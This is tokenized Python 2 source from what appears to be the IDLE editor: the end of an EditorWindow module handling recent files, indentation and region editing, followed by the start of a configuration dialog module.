if os . path . exists ( self . recent_files_path ) : <EOL> rf_list_file = open ( self . recent_files_path , '<STR_LIT:r>' ) <EOL> try : <EOL> rf_list = rf_list_file . readlines ( ) <EOL> finally : <EOL> rf_list_file . close ( ) <EOL> if new_file : <EOL> new_file = os . path . abspath ( new_file ) + '<STR_LIT:\n>' <EOL> if new_file in rf_list : <EOL> rf_list . remove ( new_file ) <EOL> rf_list . insert ( <NUM_LIT:0> , new_file ) <EOL> bad_paths = [ ] <EOL> for path in rf_list : <EOL> if '<STR_LIT>' in path or not os . path . exists ( path [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) : <EOL> bad_paths . 
append ( path ) <EOL> rf_list = [ path for path in rf_list if path not in bad_paths ] <EOL> ulchars = "<STR_LIT>" <EOL> rf_list = rf_list [ <NUM_LIT:0> : len ( ulchars ) ] <EOL> rf_file = open ( self . recent_files_path , '<STR_LIT:w>' ) <EOL> try : <EOL> rf_file . writelines ( rf_list ) <EOL> finally : <EOL> rf_file . close ( ) <EOL> for instance in self . top . instance_dict . keys ( ) : <EOL> menu = instance . recent_files_menu <EOL> menu . delete ( <NUM_LIT:1> , END ) <EOL> for i , file in zip ( count ( ) , rf_list ) : <EOL> file_name = file [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> ufile_name = self . _filename_to_unicode ( file_name ) <EOL> callback = instance . __recent_file_callback ( file_name ) <EOL> menu . add_command ( label = ulchars [ i ] + "<STR_LIT:U+0020>" + ufile_name , <EOL> command = callback , <EOL> underline = <NUM_LIT:0> ) <EOL> def __recent_file_callback ( self , file_name ) : <EOL> def open_recent_file ( fn_closure = file_name ) : <EOL> self . io . open ( editFile = fn_closure ) <EOL> return open_recent_file <EOL> def saved_change_hook ( self ) : <EOL> short = self . short_title ( ) <EOL> long = self . long_title ( ) <EOL> if short and long : <EOL> title = short + "<STR_LIT>" + long <EOL> elif short : <EOL> title = short <EOL> elif long : <EOL> title = long <EOL> else : <EOL> title = "<STR_LIT>" <EOL> icon = short or long or title <EOL> if not self . get_saved ( ) : <EOL> title = "<STR_LIT>" % title <EOL> icon = "<STR_LIT>" % icon <EOL> self . top . wm_title ( title ) <EOL> self . top . wm_iconname ( icon ) <EOL> def get_saved ( self ) : <EOL> return self . undo . get_saved ( ) <EOL> def set_saved ( self , flag ) : <EOL> self . undo . set_saved ( flag ) <EOL> def reset_undo ( self ) : <EOL> self . undo . reset_undo ( ) <EOL> def short_title ( self ) : <EOL> filename = self . io . filename <EOL> if filename : <EOL> filename = os . path . basename ( filename ) <EOL> return self . 
_filename_to_unicode ( filename ) <EOL> def long_title ( self ) : <EOL> return self . _filename_to_unicode ( self . io . filename or "<STR_LIT>" ) <EOL> def center_insert_event ( self , event ) : <EOL> self . center ( ) <EOL> def center ( self , mark = "<STR_LIT>" ) : <EOL> text = self . text <EOL> top , bot = self . getwindowlines ( ) <EOL> lineno = self . getlineno ( mark ) <EOL> height = bot - top <EOL> newtop = max ( <NUM_LIT:1> , lineno - height // <NUM_LIT:2> ) <EOL> text . yview ( float ( newtop ) ) <EOL> def getwindowlines ( self ) : <EOL> text = self . text <EOL> top = self . getlineno ( "<STR_LIT>" ) <EOL> bot = self . getlineno ( "<STR_LIT>" ) <EOL> if top == bot and text . winfo_height ( ) == <NUM_LIT:1> : <EOL> height = int ( text [ '<STR_LIT>' ] ) <EOL> bot = top + height - <NUM_LIT:1> <EOL> return top , bot <EOL> def getlineno ( self , mark = "<STR_LIT>" ) : <EOL> text = self . text <EOL> return int ( float ( text . index ( mark ) ) ) <EOL> def get_geometry ( self ) : <EOL> "<STR_LIT>" <EOL> geom = self . top . wm_geometry ( ) <EOL> m = re . match ( r"<STR_LIT>" , geom ) <EOL> tuple = ( map ( int , m . groups ( ) ) ) <EOL> return tuple <EOL> def close_event ( self , event ) : <EOL> self . close ( ) <EOL> def maybesave ( self ) : <EOL> if self . io : <EOL> if not self . get_saved ( ) : <EOL> if self . top . state ( ) != '<STR_LIT>' : <EOL> self . top . deiconify ( ) <EOL> self . top . lower ( ) <EOL> self . top . lift ( ) <EOL> return self . io . maybesave ( ) <EOL> def close ( self ) : <EOL> reply = self . maybesave ( ) <EOL> if str ( reply ) != "<STR_LIT>" : <EOL> self . _close ( ) <EOL> return reply <EOL> def _close ( self ) : <EOL> if self . io . filename : <EOL> self . update_recent_files_list ( new_file = self . io . filename ) <EOL> WindowList . unregister_callback ( self . postwindowsmenu ) <EOL> if self . close_hook : <EOL> self . close_hook ( ) <EOL> self . flist = None <EOL> colorizing = <NUM_LIT:0> <EOL> self . 
unload_extensions ( ) <EOL> self . io . close ( ) ; self . io = None <EOL> self . undo = None <EOL> if self . color : <EOL> colorizing = self . color . colorizing <EOL> doh = colorizing and self . top <EOL> self . color . close ( doh ) <EOL> self . text = None <EOL> self . tkinter_vars = None <EOL> self . per . close ( ) ; self . per = None <EOL> if not colorizing : <EOL> self . top . destroy ( ) <EOL> def load_extensions ( self ) : <EOL> self . extensions = { } <EOL> self . load_standard_extensions ( ) <EOL> def unload_extensions ( self ) : <EOL> for ins in self . extensions . values ( ) : <EOL> if hasattr ( ins , "<STR_LIT>" ) : <EOL> ins . close ( ) <EOL> self . extensions = { } <EOL> def load_standard_extensions ( self ) : <EOL> for name in self . get_standard_extension_names ( ) : <EOL> try : <EOL> self . load_extension ( name ) <EOL> except : <EOL> print "<STR_LIT>" , repr ( name ) <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> def get_standard_extension_names ( self ) : <EOL> return idleConf . GetExtensions ( editor_only = True ) <EOL> def load_extension ( self , name ) : <EOL> try : <EOL> mod = __import__ ( name , globals ( ) , locals ( ) , [ ] ) <EOL> except ImportError : <EOL> print "<STR_LIT>" , name <EOL> return <EOL> cls = getattr ( mod , name ) <EOL> keydefs = idleConf . GetExtensionBindings ( name ) <EOL> if hasattr ( cls , "<STR_LIT>" ) : <EOL> self . fill_menus ( cls . menudefs , keydefs ) <EOL> ins = cls ( self ) <EOL> self . extensions [ name ] = ins <EOL> if keydefs : <EOL> self . apply_bindings ( keydefs ) <EOL> for vevent in keydefs . keys ( ) : <EOL> methodname = vevent . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) <EOL> while methodname [ : <NUM_LIT:1> ] == '<STR_LIT:<>' : <EOL> methodname = methodname [ <NUM_LIT:1> : ] <EOL> while methodname [ - <NUM_LIT:1> : ] == '<STR_LIT:>>' : <EOL> methodname = methodname [ : - <NUM_LIT:1> ] <EOL> methodname = methodname + "<STR_LIT>" <EOL> if hasattr ( ins , methodname ) : <EOL> self . 
text . bind ( vevent , getattr ( ins , methodname ) ) <EOL> def apply_bindings ( self , keydefs = None ) : <EOL> if keydefs is None : <EOL> keydefs = self . Bindings . default_keydefs <EOL> text = self . text <EOL> text . keydefs = keydefs <EOL> for event , keylist in keydefs . items ( ) : <EOL> if keylist : <EOL> text . event_add ( event , * keylist ) <EOL> def fill_menus ( self , menudefs = None , keydefs = None ) : <EOL> """<STR_LIT>""" <EOL> if menudefs is None : <EOL> menudefs = self . Bindings . menudefs <EOL> if keydefs is None : <EOL> keydefs = self . Bindings . default_keydefs <EOL> menudict = self . menudict <EOL> text = self . text <EOL> for mname , entrylist in menudefs : <EOL> menu = menudict . get ( mname ) <EOL> if not menu : <EOL> continue <EOL> for entry in entrylist : <EOL> if not entry : <EOL> menu . add_separator ( ) <EOL> else : <EOL> label , eventname = entry <EOL> checkbutton = ( label [ : <NUM_LIT:1> ] == '<STR_LIT:!>' ) <EOL> if checkbutton : <EOL> label = label [ <NUM_LIT:1> : ] <EOL> underline , label = prepstr ( label ) <EOL> accelerator = get_accelerator ( keydefs , eventname ) <EOL> def command ( text = text , eventname = eventname ) : <EOL> text . event_generate ( eventname ) <EOL> if checkbutton : <EOL> var = self . get_var_obj ( eventname , BooleanVar ) <EOL> menu . add_checkbutton ( label = label , underline = underline , <EOL> command = command , accelerator = accelerator , <EOL> variable = var ) <EOL> else : <EOL> menu . add_command ( label = label , underline = underline , <EOL> command = command , <EOL> accelerator = accelerator ) <EOL> def getvar ( self , name ) : <EOL> var = self . get_var_obj ( name ) <EOL> if var : <EOL> value = var . get ( ) <EOL> return value <EOL> else : <EOL> raise NameError , name <EOL> def setvar ( self , name , value , vartype = None ) : <EOL> var = self . get_var_obj ( name , vartype ) <EOL> if var : <EOL> var . 
set ( value ) <EOL> else : <EOL> raise NameError , name <EOL> def get_var_obj ( self , name , vartype = None ) : <EOL> var = self . tkinter_vars . get ( name ) <EOL> if not var and vartype : <EOL> self . tkinter_vars [ name ] = var = vartype ( self . text ) <EOL> return var <EOL> def is_char_in_string ( self , text_index ) : <EOL> if self . color : <EOL> return self . text . tag_prevrange ( "<STR_LIT>" , text_index ) or "<STR_LIT>" in self . text . tag_names ( text_index ) <EOL> else : <EOL> return <NUM_LIT:1> <EOL> def get_selection_indices ( self ) : <EOL> try : <EOL> first = self . text . index ( "<STR_LIT>" ) <EOL> last = self . text . index ( "<STR_LIT>" ) <EOL> return first , last <EOL> except TclError : <EOL> return None , None <EOL> def get_tabwidth ( self ) : <EOL> current = self . text [ '<STR_LIT>' ] or TK_TABWIDTH_DEFAULT <EOL> return int ( current ) <EOL> def set_tabwidth ( self , newtabwidth ) : <EOL> text = self . text <EOL> if self . get_tabwidth ( ) != newtabwidth : <EOL> pixels = text . tk . call ( "<STR_LIT>" , "<STR_LIT>" , text [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" , text . master , <EOL> "<STR_LIT:n>" * newtabwidth ) <EOL> text . configure ( tabs = pixels ) <EOL> def set_indentation_params ( self , ispythonsource , guess = True ) : <EOL> if guess and ispythonsource : <EOL> i = self . guess_indent ( ) <EOL> if <NUM_LIT:2> <= i <= <NUM_LIT:8> : <EOL> self . indentwidth = i <EOL> if self . indentwidth != self . tabwidth : <EOL> self . usetabs = False <EOL> self . set_tabwidth ( self . tabwidth ) <EOL> def smart_backspace_event ( self , event ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> if first and last : <EOL> text . delete ( first , last ) <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> return "<STR_LIT>" <EOL> chars = text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if chars == '<STR_LIT>' : <EOL> if text . compare ( "<STR_LIT>" , "<STR_LIT:>>" , "<STR_LIT:1.0>" ) : <EOL> text . 
delete ( "<STR_LIT>" ) <EOL> else : <EOL> text . bell ( ) <EOL> return "<STR_LIT>" <EOL> if chars [ - <NUM_LIT:1> ] not in "<STR_LIT>" : <EOL> text . delete ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> tabwidth = self . tabwidth <EOL> have = len ( chars . expandtabs ( tabwidth ) ) <EOL> assert have > <NUM_LIT:0> <EOL> want = ( ( have - <NUM_LIT:1> ) // self . indentwidth ) * self . indentwidth <EOL> last_line_of_prompt = sys . ps1 . split ( '<STR_LIT:\n>' ) [ - <NUM_LIT:1> ] <EOL> ncharsdeleted = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> if chars == last_line_of_prompt : <EOL> break <EOL> chars = chars [ : - <NUM_LIT:1> ] <EOL> ncharsdeleted = ncharsdeleted + <NUM_LIT:1> <EOL> have = len ( chars . expandtabs ( tabwidth ) ) <EOL> if have <= want or chars [ - <NUM_LIT:1> ] not in "<STR_LIT>" : <EOL> break <EOL> text . undo_block_start ( ) <EOL> text . delete ( "<STR_LIT>" % ncharsdeleted , "<STR_LIT>" ) <EOL> if have < want : <EOL> text . insert ( "<STR_LIT>" , '<STR_LIT:U+0020>' * ( want - have ) ) <EOL> text . undo_block_stop ( ) <EOL> return "<STR_LIT>" <EOL> def smart_indent_event ( self , event ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> text . undo_block_start ( ) <EOL> try : <EOL> if first and last : <EOL> if index2line ( first ) != index2line ( last ) : <EOL> return self . indent_region_event ( event ) <EOL> text . delete ( first , last ) <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> prefix = text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> raw , effective = classifyws ( prefix , self . tabwidth ) <EOL> if raw == len ( prefix ) : <EOL> self . reindent_to ( effective + self . indentwidth ) <EOL> else : <EOL> if self . usetabs : <EOL> pad = '<STR_LIT:\t>' <EOL> else : <EOL> effective = len ( prefix . expandtabs ( self . tabwidth ) ) <EOL> n = self . indentwidth <EOL> pad = '<STR_LIT:U+0020>' * ( n - effective % n ) <EOL> text . insert ( "<STR_LIT>" , pad ) <EOL> text . 
see ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> finally : <EOL> text . undo_block_stop ( ) <EOL> def newline_and_indent_event ( self , event ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> text . undo_block_start ( ) <EOL> try : <EOL> if first and last : <EOL> text . delete ( first , last ) <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> line = text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> i , n = <NUM_LIT:0> , len ( line ) <EOL> while i < n and line [ i ] in "<STR_LIT>" : <EOL> i = i + <NUM_LIT:1> <EOL> if i == n : <EOL> text . insert ( "<STR_LIT>" , '<STR_LIT:\n>' ) <EOL> return "<STR_LIT>" <EOL> indent = line [ : i ] <EOL> i = <NUM_LIT:0> <EOL> last_line_of_prompt = sys . ps1 . split ( '<STR_LIT:\n>' ) [ - <NUM_LIT:1> ] <EOL> while line and line [ - <NUM_LIT:1> ] in "<STR_LIT>" and line != last_line_of_prompt : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> i = i + <NUM_LIT:1> <EOL> if i : <EOL> text . delete ( "<STR_LIT>" % i , "<STR_LIT>" ) <EOL> while text . get ( "<STR_LIT>" ) in "<STR_LIT>" : <EOL> text . delete ( "<STR_LIT>" ) <EOL> text . insert ( "<STR_LIT>" , '<STR_LIT:\n>' ) <EOL> lno = index2line ( text . index ( '<STR_LIT>' ) ) <EOL> y = PyParse . Parser ( self . indentwidth , self . tabwidth ) <EOL> if not self . context_use_ps1 : <EOL> for context in self . num_context_lines : <EOL> startat = max ( lno - context , <NUM_LIT:1> ) <EOL> startatindex = ` startat ` + "<STR_LIT>" <EOL> rawtext = text . get ( startatindex , "<STR_LIT>" ) <EOL> y . set_str ( rawtext ) <EOL> bod = y . find_good_parse_start ( <EOL> self . context_use_ps1 , <EOL> self . _build_char_in_string_func ( startatindex ) ) <EOL> if bod is not None or startat == <NUM_LIT:1> : <EOL> break <EOL> y . set_lo ( bod or <NUM_LIT:0> ) <EOL> else : <EOL> r = text . tag_prevrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if r : <EOL> startatindex = r [ <NUM_LIT:1> ] <EOL> else : <EOL> startatindex = "<STR_LIT:1.0>" <EOL> rawtext = text . 
get ( startatindex , "<STR_LIT>" ) <EOL> y . set_str ( rawtext ) <EOL> y . set_lo ( <NUM_LIT:0> ) <EOL> c = y . get_continuation_type ( ) <EOL> if c != PyParse . C_NONE : <EOL> if c == PyParse . C_STRING_FIRST_LINE : <EOL> pass <EOL> elif c == PyParse . C_STRING_NEXT_LINES : <EOL> text . insert ( "<STR_LIT>" , indent ) <EOL> elif c == PyParse . C_BRACKET : <EOL> self . reindent_to ( y . compute_bracket_indent ( ) ) <EOL> elif c == PyParse . C_BACKSLASH : <EOL> if y . get_num_lines_in_stmt ( ) > <NUM_LIT:1> : <EOL> text . insert ( "<STR_LIT>" , indent ) <EOL> else : <EOL> self . reindent_to ( y . compute_backslash_indent ( ) ) <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" % ( c , ) <EOL> return "<STR_LIT>" <EOL> indent = y . get_base_indent_string ( ) <EOL> text . insert ( "<STR_LIT>" , indent ) <EOL> if y . is_block_opener ( ) : <EOL> self . smart_indent_event ( event ) <EOL> elif indent and y . is_block_closer ( ) : <EOL> self . smart_backspace_event ( event ) <EOL> return "<STR_LIT>" <EOL> finally : <EOL> text . see ( "<STR_LIT>" ) <EOL> text . undo_block_stop ( ) <EOL> def _build_char_in_string_func ( self , startindex ) : <EOL> def inner ( offset , _startindex = startindex , <EOL> _icis = self . is_char_in_string ) : <EOL> return _icis ( _startindex + "<STR_LIT>" % offset ) <EOL> return inner <EOL> def indent_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if line : <EOL> raw , effective = classifyws ( line , self . tabwidth ) <EOL> effective = effective + self . indentwidth <EOL> lines [ pos ] = self . _make_blanks ( effective ) + line [ raw : ] <EOL> self . set_region ( head , tail , chars , lines ) <EOL> return "<STR_LIT>" <EOL> def dedent_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . 
get_region ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if line : <EOL> raw , effective = classifyws ( line , self . tabwidth ) <EOL> effective = max ( effective - self . indentwidth , <NUM_LIT:0> ) <EOL> lines [ pos ] = self . _make_blanks ( effective ) + line [ raw : ] <EOL> self . set_region ( head , tail , chars , lines ) <EOL> return "<STR_LIT>" <EOL> def comment_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) - <NUM_LIT:1> ) : <EOL> line = lines [ pos ] <EOL> lines [ pos ] = '<STR_LIT>' + line <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def uncomment_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if not line : <EOL> continue <EOL> if line [ : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> line = line [ <NUM_LIT:2> : ] <EOL> elif line [ : <NUM_LIT:1> ] == '<STR_LIT:#>' : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> lines [ pos ] = line <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def tabify_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> tabwidth = self . _asktabwidth ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if line : <EOL> raw , effective = classifyws ( line , tabwidth ) <EOL> ntabs , nspaces = divmod ( effective , tabwidth ) <EOL> lines [ pos ] = '<STR_LIT:\t>' * ntabs + '<STR_LIT:U+0020>' * nspaces + line [ raw : ] <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def untabify_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> tabwidth = self . _asktabwidth ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> lines [ pos ] = lines [ pos ] . expandtabs ( tabwidth ) <EOL> self . 
set_region ( head , tail , chars , lines ) <EOL> def toggle_tabs_event ( self , event ) : <EOL> if self . askyesno ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" + ( "<STR_LIT>" , "<STR_LIT>" ) [ self . usetabs ] + <EOL> "<STR_LIT>" + <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) [ self . usetabs ] + "<STR_LIT>" + <EOL> "<STR_LIT>" , <EOL> parent = self . text ) : <EOL> self . usetabs = not self . usetabs <EOL> self . indentwidth = <NUM_LIT:8> <EOL> return "<STR_LIT>" <EOL> def change_indentwidth_event ( self , event ) : <EOL> new = self . askinteger ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> parent = self . text , <EOL> initialvalue = self . indentwidth , <EOL> minvalue = <NUM_LIT:2> , <EOL> maxvalue = <NUM_LIT:16> ) <EOL> if new and new != self . indentwidth and not self . usetabs : <EOL> self . indentwidth = new <EOL> return "<STR_LIT>" <EOL> def get_region ( self ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> if first and last : <EOL> head = text . index ( first + "<STR_LIT>" ) <EOL> tail = text . index ( last + "<STR_LIT>" ) <EOL> else : <EOL> head = text . index ( "<STR_LIT>" ) <EOL> tail = text . index ( "<STR_LIT>" ) <EOL> chars = text . get ( head , tail ) <EOL> lines = chars . split ( "<STR_LIT:\n>" ) <EOL> return head , tail , chars , lines <EOL> def set_region ( self , head , tail , chars , lines ) : <EOL> text = self . text <EOL> newchars = "<STR_LIT:\n>" . join ( lines ) <EOL> if newchars == chars : <EOL> text . bell ( ) <EOL> return <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> text . mark_set ( "<STR_LIT>" , head ) <EOL> text . undo_block_start ( ) <EOL> text . delete ( head , tail ) <EOL> text . insert ( head , newchars ) <EOL> text . undo_block_stop ( ) <EOL> text . tag_add ( "<STR_LIT>" , head , "<STR_LIT>" ) <EOL> def _make_blanks ( self , n ) : <EOL> if self . usetabs : <EOL> ntabs , nspaces = divmod ( n , self . 
tabwidth ) <EOL> return '<STR_LIT:\t>' * ntabs + '<STR_LIT:U+0020>' * nspaces <EOL> else : <EOL> return '<STR_LIT:U+0020>' * n <EOL> def reindent_to ( self , column ) : <EOL> text = self . text <EOL> text . undo_block_start ( ) <EOL> if text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> text . delete ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if column : <EOL> text . insert ( "<STR_LIT>" , self . _make_blanks ( column ) ) <EOL> text . undo_block_stop ( ) <EOL> def _asktabwidth ( self ) : <EOL> return self . askinteger ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> parent = self . text , <EOL> initialvalue = self . indentwidth , <EOL> minvalue = <NUM_LIT:2> , <EOL> maxvalue = <NUM_LIT:16> ) or self . tabwidth <EOL> def guess_indent ( self ) : <EOL> opener , indented = IndentSearcher ( self . text , self . tabwidth ) . run ( ) <EOL> if opener and indented : <EOL> raw , indentsmall = classifyws ( opener , self . tabwidth ) <EOL> raw , indentlarge = classifyws ( indented , self . tabwidth ) <EOL> else : <EOL> indentsmall = indentlarge = <NUM_LIT:0> <EOL> return indentlarge - indentsmall <EOL> def index2line ( index ) : <EOL> return int ( float ( index ) ) <EOL> def classifyws ( s , tabwidth ) : <EOL> raw = effective = <NUM_LIT:0> <EOL> for ch in s : <EOL> if ch == '<STR_LIT:U+0020>' : <EOL> raw = raw + <NUM_LIT:1> <EOL> effective = effective + <NUM_LIT:1> <EOL> elif ch == '<STR_LIT:\t>' : <EOL> raw = raw + <NUM_LIT:1> <EOL> effective = ( effective // tabwidth + <NUM_LIT:1> ) * tabwidth <EOL> else : <EOL> break <EOL> return raw , effective <EOL> import tokenize <EOL> _tokenize = tokenize <EOL> del tokenize <EOL> class IndentSearcher ( object ) : <EOL> def __init__ ( self , text , tabwidth ) : <EOL> self . text = text <EOL> self . tabwidth = tabwidth <EOL> self . i = self . finished = <NUM_LIT:0> <EOL> self . blkopenline = self . indentedline = None <EOL> def readline ( self ) : <EOL> if self . finished : <EOL> return "<STR_LIT>" <EOL> i = self . i = self . 
i + <NUM_LIT:1> <EOL> mark = repr ( i ) + "<STR_LIT>" <EOL> if self . text . compare ( mark , "<STR_LIT>" , "<STR_LIT:end>" ) : <EOL> return "<STR_LIT>" <EOL> return self . text . get ( mark , mark + "<STR_LIT>" ) <EOL> def tokeneater ( self , type , token , start , end , line , <EOL> INDENT = _tokenize . INDENT , <EOL> NAME = _tokenize . NAME , <EOL> OPENERS = ( '<STR_LIT:class>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if self . finished : <EOL> pass <EOL> elif type == NAME and token in OPENERS : <EOL> self . blkopenline = line <EOL> elif type == INDENT and self . blkopenline : <EOL> self . indentedline = line <EOL> self . finished = <NUM_LIT:1> <EOL> def run ( self ) : <EOL> save_tabsize = _tokenize . tabsize <EOL> _tokenize . tabsize = self . tabwidth <EOL> try : <EOL> try : <EOL> _tokenize . tokenize ( self . readline , self . tokeneater ) <EOL> except _tokenize . TokenError : <EOL> pass <EOL> finally : <EOL> _tokenize . tabsize = save_tabsize <EOL> return self . blkopenline , self . indentedline <EOL> def prepstr ( s ) : <EOL> i = s . find ( '<STR_LIT:_>' ) <EOL> if i >= <NUM_LIT:0> : <EOL> s = s [ : i ] + s [ i + <NUM_LIT:1> : ] <EOL> return i , s <EOL> keynames = { <EOL> '<STR_LIT>' : '<STR_LIT:[>' , <EOL> '<STR_LIT>' : '<STR_LIT:]>' , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> } <EOL> def get_accelerator ( keydefs , eventname ) : <EOL> keylist = keydefs . get ( eventname ) <EOL> if not keylist : <EOL> return "<STR_LIT>" <EOL> s = keylist [ <NUM_LIT:0> ] <EOL> s = re . sub ( r"<STR_LIT>" , lambda m : m . group ( ) . upper ( ) , s ) <EOL> s = re . sub ( r"<STR_LIT>" , lambda m : keynames . get ( m . group ( ) , m . group ( ) ) , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT:->" , "<STR_LIT:+>" , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT:U+0020>" , s ) <EOL> s = re . 
sub ( "<STR_LIT:<>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT:>>" , "<STR_LIT>" , s ) <EOL> return s <EOL> def fixwordbreaks ( root ) : <EOL> tk = root . tk <EOL> tk . call ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> tk . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> tk . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test ( ) : <EOL> root = Tk ( ) <EOL> fixwordbreaks ( root ) <EOL> root . withdraw ( ) <EOL> if sys . argv [ <NUM_LIT:1> : ] : <EOL> filename = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> filename = None <EOL> edit = EditorWindow ( root = root , filename = filename ) <EOL> edit . set_close_hook ( root . quit ) <EOL> root . mainloop ( ) <EOL> root . destroy ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> from Tkinter import * <EOL> import tkMessageBox , tkColorChooser , tkFont <EOL> import string , copy <EOL> from configHandler import idleConf <EOL> from dynOptionMenuWidget import DynOptionMenu <EOL> from tabpage import TabPageSet <EOL> from keybindingDialog import GetKeysDialog <EOL> from configSectionNameDialog import GetCfgSectionNameDialog <EOL> from configHelpSourceEdit import GetHelpSourceDialog <EOL> class ConfigDialog ( Toplevel ) : <EOL> def __init__ ( self , parent , title ) : <EOL> Toplevel . __init__ ( self , parent ) <EOL> self . configure ( borderwidth = <NUM_LIT:5> ) <EOL> self . geometry ( "<STR_LIT>" % ( parent . winfo_rootx ( ) + <NUM_LIT:20> , <EOL> parent . winfo_rooty ( ) + <NUM_LIT:30> ) ) <EOL> self . themeElements = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:string>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:error>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> self . ResetChangedItems ( ) <EOL> self . CreateWidgets ( ) <EOL> self . resizable ( height = FALSE , width = FALSE ) <EOL> self . transient ( parent ) <EOL> self . grab_set ( ) <EOL> self . protocol ( "<STR_LIT>" , self . Cancel ) <EOL> self . parent = parent <EOL> self . tabPages . focus_set ( ) <EOL> self . LoadConfigs ( ) <EOL> self . AttachVarCallbacks ( ) <EOL> self . wait_window ( ) <EOL> def CreateWidgets ( self ) : <EOL> self . 
tabPages = TabPageSet ( self , <EOL> pageNames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . tabPages . ChangePage ( ) <EOL> frameActionButtons = Frame ( self ) <EOL> self . buttonHelp = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Help , takefocus = FALSE ) <EOL> self . buttonOk = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Ok , takefocus = FALSE ) <EOL> self . buttonApply = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Apply , takefocus = FALSE ) <EOL> self . buttonCancel = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Cancel , takefocus = FALSE ) <EOL> self . CreatePageFontTab ( ) <EOL> self . CreatePageHighlight ( ) <EOL> self . CreatePageKeys ( ) <EOL> self . CreatePageGeneral ( ) <EOL> self . buttonHelp . pack ( side = RIGHT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonOk . pack ( side = LEFT , padx = <NUM_LIT:5> 